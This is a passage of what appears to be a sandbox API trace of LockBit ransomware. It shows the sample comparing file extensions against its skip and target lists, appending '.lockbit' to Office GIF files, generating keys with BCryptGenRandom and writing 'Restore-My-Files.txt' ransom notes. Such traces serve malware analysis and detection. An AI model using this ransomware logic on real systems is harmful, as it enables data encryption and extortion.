lpString2=".GIF") returned -1 [0204.846] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.846] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.846] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.846] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.846] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.846] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.846] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.846] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.846] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.846] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.846] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.846] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.846] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.846] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.846] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.846] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.847] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.847] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.847] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.847] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.847] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.847] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.847] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.847] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21520_.GIF.lockbit") returned 78 [0204.847] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21520_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21520_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.849] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.849] malloc (_Size=0x40068) returned 0x3df0008 [0204.849] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=176) returned 1 [0204.849] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.850] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.850] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.850] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.850] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.855] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21520_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21520_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.855] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.855] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.855] free (_Block=0x1fa2ed8) [0204.855] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21520_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.855] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.855] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.855] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8b6500, ftCreationTime.dwHighDateTime=0x1bd8f93, ftLastAccessTime.dwLowDateTime=0xbcf1f8a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xf8b6500, ftLastWriteTime.dwHighDateTime=0x1bd8f93, nFileSizeHigh=0x0, nFileSizeLow=0x148, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21533_.GIF", cAlternateFileName="")) returned 1 [0204.855] lstrcmpiW (lpString1=".", lpString2="BD21533_.GIF") returned -1 [0204.855] lstrcmpiW (lpString1="..", lpString2="BD21533_.GIF") returned -1 [0204.855] PathFindExtensionW (pszPath="BD21533_.GIF") returned=".GIF" [0204.856] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.856] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.856] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.856] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.856] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.856] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.856] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.856] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.856] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.856] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.856] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.856] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.856] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.856] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.856] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.856] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.856] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.856] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.856] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.856] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.856] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.856] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.856] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.856] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.856] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.856] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.856] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.856] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.857] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.857] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.857] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.857] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.857] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.857] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.857] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.857] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.857] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.857] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.857] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.857] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.857] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.857] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.857] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.857] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.857] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.857] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.857] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.857] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21533_.GIF") returned 1 [0204.857] lstrcmpiW (lpString1="ntldr", lpString2="BD21533_.GIF") returned 1 [0204.857] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21533_.GIF") returned 1 [0204.857] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21533_.GIF") returned 1 [0204.857] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21533_.GIF") returned -1 [0204.857] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21533_.GIF") returned 1 [0204.857] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21533_.GIF") returned 1 [0204.857] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.857] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21533_.GIF") returned=".GIF" [0204.858] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.858] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.858] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.858] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.858] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.858] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.858] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.858] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.858] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.858] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.858] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.858] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.858] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.858] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.858] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.858] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.858] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.858] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.858] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.858] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.858] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.858] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.858] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.858] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.858] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.858] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.858] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.858] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.859] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21533_.GIF.lockbit") returned 78 [0204.859] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21533_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21533_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.860] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.860] malloc (_Size=0x40068) returned 0x3df0008 [0204.860] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=328) returned 1 [0204.860] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.861] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.861] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.861] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.861] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.866] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21533_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21533_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.866] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.866] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.866] free (_Block=0x1fa2ed8) [0204.866] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21533_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.866] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.866] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.866] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8b6500, ftCreationTime.dwHighDateTime=0x1bd8f93, ftLastAccessTime.dwLowDateTime=0xbcf1f8a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xf8b6500, ftLastWriteTime.dwHighDateTime=0x1bd8f93, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21534_.GIF", cAlternateFileName="")) returned 1 [0204.866] lstrcmpiW (lpString1=".", lpString2="BD21534_.GIF") returned -1 [0204.866] lstrcmpiW (lpString1="..", lpString2="BD21534_.GIF") returned -1 [0204.866] PathFindExtensionW (pszPath="BD21534_.GIF") returned=".GIF" [0204.866] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.866] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.866] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.866] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.866] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.866] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.866] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.866] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.867] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.867] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.867] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.867] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.867] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.867] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.867] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.867] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.867] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.867] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.867] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.867] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.867] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.867] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.867] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.867] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.867] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.867] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.867] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.867] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.867] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.867] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.867] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.867] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.867] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.867] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.867] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.867] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.868] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.868] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.868] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.868] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.868] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.868] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.868] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.868] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.868] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.868] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.868] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.868] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21534_.GIF") returned 1 [0204.868] lstrcmpiW (lpString1="ntldr", lpString2="BD21534_.GIF") returned 1 [0204.868] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21534_.GIF") returned 1 [0204.868] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21534_.GIF") returned 1 [0204.868] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21534_.GIF") returned -1 [0204.868] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21534_.GIF") returned 1 [0204.868] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21534_.GIF") returned 1 [0204.868] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.868] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21534_.GIF") returned=".GIF" [0204.868] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.868] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.868] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.868] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.868] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.868] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.868] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.868] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.869] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.869] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.869] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.869] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.869] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.869] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.869] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.869] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.869] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.869] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.869] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.869] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.869] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.869] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.869] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.869] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.869] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.869] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.869] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.869] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.869] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21534_.GIF.lockbit") returned 78 [0204.869] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21534_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21534_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.871] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.871] malloc (_Size=0x40068) returned 0x3df0008 [0204.871] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=240) returned 1 [0204.871] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.871] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.871] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.872] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.872] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.872] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.876] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21534_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21534_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.876] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.876] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.876] free (_Block=0x1fa2ed8) [0204.876] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21534_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.876] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.876] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.876] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8b6500, ftCreationTime.dwHighDateTime=0x1bd8f93, ftLastAccessTime.dwLowDateTime=0xbcf1f8a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xf8b6500, ftLastWriteTime.dwHighDateTime=0x1bd8f93, nFileSizeHigh=0x0, nFileSizeLow=0x12b, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21535_.GIF", cAlternateFileName="")) returned 1 [0204.876] lstrcmpiW (lpString1=".", lpString2="BD21535_.GIF") returned -1 [0204.876] lstrcmpiW (lpString1="..", lpString2="BD21535_.GIF") returned -1 [0204.876] PathFindExtensionW (pszPath="BD21535_.GIF") returned=".GIF" [0204.876] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.876] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.876] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.876] lstrcmpiW (lpString1=".ani", 